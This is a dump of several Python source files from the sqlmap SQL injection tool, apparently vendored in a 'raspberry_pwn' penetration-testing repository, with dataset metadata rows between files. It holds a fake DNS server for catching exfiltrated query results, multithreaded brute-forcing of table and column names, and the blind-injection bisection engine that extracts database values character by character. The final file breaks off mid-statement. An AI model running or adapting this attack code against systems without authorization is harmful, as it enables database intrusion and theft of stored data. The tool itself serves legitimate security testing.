#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import urllib2 class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler): """ Reference: http://selenic.com/hg/rev/6c51a5056020 Fix for a: http://bugs.python.org/issue8797 """ def __init__(self, *args, **kwargs): urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) self.retried_req = set() self.retried_count = 0 def reset_retry_count(self): # Python 2.6.5 will call this on 401 or 407 errors and thus loop # forever. We disable reset_retry_count completely and reset in # http_error_auth_reqed instead. pass def http_error_auth_reqed(self, auth_header, host, req, headers): # Reset the retry counter once for each request. if hash(req) not in self.retried_req: self.retried_req.add(hash(req)) self.retried_count = 0 else: if self.retried_count > 5: raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None) else: self.retried_count += 1 return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( self, auth_header, host, req, headers)
1,377
Python
.py
33
32.909091
85
0.625561
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,957
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,958
pkihandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/pkihandler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import urllib2 from lib.core.data import conf class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): def __init__(self, key_file): urllib2.HTTPSHandler.__init__(self) self.key_file = key_file def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout)
594
Python
.py
16
33
90
0.729021
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,959
dns.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/dns.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re import socket import threading import time class DNSQuery(object): """ Used for making fake DNS resolution responses based on received raw request Reference(s): http://code.activestate.com/recipes/491264-mini-fake-dns-server/ https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py """ def __init__(self, raw): self._raw = raw self._query = "" type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits if type_ == 0: # Standard query i = 12 j = ord(raw[i]) while j != 0: self._query += raw[i + 1:i + j + 1] + '.' i = i + j + 1 j = ord(raw[i]) def response(self, resolution): """ Crafts raw DNS resolution response packet """ retVal = "" if self._query: retVal += self._raw[:2] # Transaction ID retVal += "\x85\x80" # Flags (Standard query response, No error) retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query retVal += "\xc0\x0c" # Pointer to domain name retVal += "\x00\x01" # Type A retVal += "\x00\x01" # Class IN retVal += "\x00\x00\x00\x20" # TTL (32 seconds) retVal += "\x00\x04" # Data length retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP return retVal class DNSServer(object): def __init__(self): self._requests = [] self._lock = threading.Lock() self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._socket.bind(("", 53)) self._running = False self._initialized = False def pop(self, prefix=None, suffix=None): """ Returns received DNS resolution request (if any) that has given prefix/suffix combination (e.g. prefix.<query result>.suffix.domain) """ retVal = None with self._lock: for _ in self._requests: if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I): retVal = _ self._requests.remove(_) break return retVal def run(self): """ Runs a DNSServer instance as a daemon thread (killed by program exit) """ def _(): try: self._running = True self._initialized = True while True: data, addr = self._socket.recvfrom(1024) _ = DNSQuery(data) self._socket.sendto(_.response("127.0.0.1"), addr) with self._lock: self._requests.append(_._query) except KeyboardInterrupt: raise finally: self._running = False thread = threading.Thread(target=_) thread.daemon = True thread.start() if __name__ == "__main__": server = None try: server = DNSServer() server.run() while not server._initialized: time.sleep(0.1) while server._running: while True: _ = server.pop() if _ is None: break else: print "[i] %s" % _ time.sleep(1) except socket.error, ex: if 'Permission' in str(ex): print "[x] Please run with sudo/Administrator privileges" else: raise except KeyboardInterrupt: os._exit(0) finally: if server: server._running = False
4,468
Python
.py
114
28.631579
123
0.477336
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,960
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,961
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/brute/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import time from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import filterListValue from lib.core.common import getFileItems from lib.core.common import Backend from lib.core.common import getPageWordSet from lib.core.common import hashDBWrite from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeStringFormat from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.settings import METADB_SUFFIX from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request import inject def _addPageTextWords(): wordsList = [] infoMsg = "adding words used on web page to the check list" logger.info(infoMsg) pageWords = getPageWordSet(kb.originalPage) for word in pageWords: word = word.lower() if len(word) > 2 and not word[0].isdigit() and word not in wordsList: wordsList.append(word) return wordsList def tableExists(tableFile, regex=None): if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common table existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " test = readInput(message, default="N") kb.tableExistsChoice = test[0] in ("y", "Y") if not kb.tableExistsChoice: return None result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException(errMsg) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.value = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not hasattr(conf, "api"): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.value: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in ((conf.db, item) for item in threadData.shared.value): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables def columnExists(columnFile, regex=None): if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common column existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " test = readInput(message, default="N") kb.columnExistsChoice = test[0] in ("y", "Y") if not kb.columnExistsChoice: return None if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException(errMsg) infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.value = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.value.append(column) if conf.verbose in (1, 2) and not hasattr(conf, "api"): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.value: if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) else: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = "numeric" else: columns[column] = "non-numeric" kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
10,756
Python
.py
207
43.130435
167
0.672072
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,962
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/brute/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,963
inference.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/blind/inference.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import threading import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import decodeIntToUnicode from lib.core.common import filterControlChars from lib.core.common import getCharset from lib.core.common import getCounter from lib.core.common import goGoodSamaritan from lib.core.common import getPartRun from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapThreadException from lib.core.settings import CHAR_INFERENCE_MARK from lib.core.settings import INFERENCE_BLANK_BREAK from lib.core.settings import INFERENCE_UNKNOWN_CHAR from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR from lib.core.settings import MAX_BISECTION_LENGTH from lib.core.settings import MAX_TIME_REVALIDATION_STEPS from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar from lib.utils.xrange import xrange def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Bisection algorithm that can be used to perform blind SQL injection on an affected host """ abortedFlag = False partialValue = u"" finalValue = None retrievedLength = 0 asciiTbl = getCharset(charsetType) timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) if retVal: if PARTIAL_HEX_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") if retVal and conf.hexConvert: partialValue = retVal infoMsg = "resuming partial value: %s" % safecharencode(partialValue) logger.info(infoMsg) elif PARTIAL_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") if retVal and not conf.hexConvert: partialValue = retVal infoMsg = "resuming partial value: %s" % safecharencode(partialValue) logger.info(infoMsg) else: infoMsg = "resumed: %s" % safecharencode(retVal) logger.info(infoMsg) return 0, retVal try: # Set kb.partRun in case "common prediction" feature (a.k.a. "good # samaritan") is used or the engine is called from the API if conf.predictOutput: kb.partRun = getPartRun() elif hasattr(conf, "api"): kb.partRun = getPartRun(alias=False) else: kb.partRun = None if partialValue: firstChar = len(partialValue) elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): firstChar = 0 elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int): firstChar = int(firstChar) - 1 else: firstChar = 0 if "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): lastChar = 0 elif dump and conf.lastChar is not None and (isinstance(conf.lastChar, int) or (isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit())): lastChar = int(conf.lastChar) elif isinstance(lastChar, basestring) and lastChar.isdigit() or isinstance(lastChar, int): lastChar = int(lastChar) else: lastChar = 0 if Backend.getDbms(): _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionUnescaped = unescaper.escape(expressionReplaced) else: expressionUnescaped = unescaper.escape(expression) if isinstance(length, basestring) and length.isdigit() or isinstance(length, int): length = int(length) else: length = None if length == 0: return 0, "" if length and (lastChar > 0 or firstChar > 0): length = min(length, lastChar or length) - firstChar if length and length > MAX_BISECTION_LENGTH: length = None showEta = conf.eta and isinstance(length, int) numThreads = min(conf.threads, length) if showEta: progress = ProgressBar(maxValue=length) if timeBasedCompare and conf.threads > 1: warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" singleTimeWarnMessage(warnMsg) if numThreads > 1: if not timeBasedCompare: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: numThreads = 1 if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput: warnMsg = "running in a single-thread mode. Please consider " warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): if isinstance(length, int) and conf.threads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) else: dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) hintlock = threading.Lock() def tryHint(idx): with hintlock: hintValue = kb.hintValue if hintValue is not None and len(hintValue) >= idx: if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): posValue = hintValue[idx - 1] else: posValue = ord(hintValue[idx - 1]) forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return hintValue[idx - 1] with hintlock: kb.hintValue = None return None def validateChar(idx, value): """ Used in time-based inference (in case that original and retrieved value are not equal there will be a deliberate delay). """ if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) return not result def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: charTbl.remove(ord('\n')) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] while len(charTbl) != 1: position = (len(charTbl) >> 1) posValue = charTbl[position] if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: minValue = posValue if type(charTbl) != xrange: charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if type(charTbl) != xrange: charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if continuousOrder: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if timeBasedCompare and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec kb.timeValidCharsRun = 0 if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: kb.timeValidCharsRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: if minValue == maxChar or maxValue == minChar: return None for index in xrange(len(originalTbl)): if originalTbl[index] == minValue: break # If we are working with non-continuous elements, both minValue and character after # are possible candidates for retVal in (originalTbl[index], originalTbl[index + 1]): forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(retVal) return None # Go multi-threading (--threads > 1) if conf.threads > 1 and isinstance(length, int) and length > 1: threadData = getCurrentThreadData() threadData.shared.value = [None] * length threadData.shared.index = [firstChar] # As list for python nested function scoping threadData.shared.start = firstChar try: def blindThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.index.acquire() if threadData.shared.index[0] - firstChar >= length: kb.locks.index.release() return threadData.shared.index[0] += 1 curidx = threadData.shared.index[0] kb.locks.index.release() if kb.threadContinue: charStart = time.time() val = getChar(curidx) if val is None: val = INFERENCE_UNKNOWN_CHAR else: break with kb.locks.value: threadData.shared.value[curidx - 1 - firstChar] = val currentValue = list(threadData.shared.value) if kb.threadContinue: if showEta: progress.progress(time.time() - charStart, threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 for i in xrange(length): if currentValue[i] is not None: endCharIndex = max(endCharIndex, i) output = '' if endCharIndex > conf.progressWidth: startCharIndex = endCharIndex - conf.progressWidth count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): output += '_' if currentValue[i] is None else currentValue[i] for i in xrange(length): count += 1 if currentValue[i] is not None else 0 if startCharIndex > 0: output = '..' + output[2:] if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): output = output[:-2] + '..' if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): _ = count - firstChar output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) output += status if _ != length else " " * len(status) dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) runThreads(numThreads, blindThread, startThreadMsg=False) except KeyboardInterrupt: abortedFlag = True finally: value = [_ for _ in partialValue] value.extend(_ for _ in threadData.shared.value) infoMsg = None # If we have got one single character not correctly fetched it # can mean that the connection to the target URL was lost if None in value: partialValue = "".join(value[:value.index(None)]) if partialValue: infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(partialValue)) else: finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"): dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar while True: index += 1 charStart = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for # the moment if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None: val = None commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl) # If there is one single output in common-outputs, check # it via equal against the query output if commonValue is not None: # One-shot query containing equals commonValue testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) query = kb.injection.data[kb.technique].vector query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue))) query = agent.suffixQuery(query) result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) # Did we have luck? if result: if showEta: progress.progress(time.time() - charStart, len(commonValue)) elif conf.verbose in (1, 2) or hasattr(conf, "api"): dataToStdout(filterControlChars(commonValue[index - 1:])) finalValue = commonValue break # If there is a common pattern starting with partialValue, # check it via equal against the substring-query output if commonPattern is not None: # Substring-query containing equals commonPattern subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) query = kb.injection.data[kb.technique].vector query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue))) query = agent.suffixQuery(query) result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) # Did we have luck? if result: val = commonPattern[index - 1:] index += len(val) - 1 # Otherwise if there is no commonValue (single match from # txt/common-outputs.txt) and no commonPattern # (common pattern) use the returned common charset only # to retrieve the query output if not val and commonCharset: val = getChar(index, commonCharset, False) # If we had no luck with commonValue and common charset, # use the returned other charset if not val: val = getChar(index, otherCharset, otherCharset == asciiTbl) else: val = getChar(index, asciiTbl) if val is None: finalValue = partialValue break if kb.data.processChar: val = kb.data.processChar(val) partialValue += val if showEta: progress.progress(time.time() - charStart, index) elif conf.verbose in (1, 2) or hasattr(conf, "api"): dataToStdout(filterControlChars(val)) # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces if len(partialValue) > INFERENCE_BLANK_BREAK and 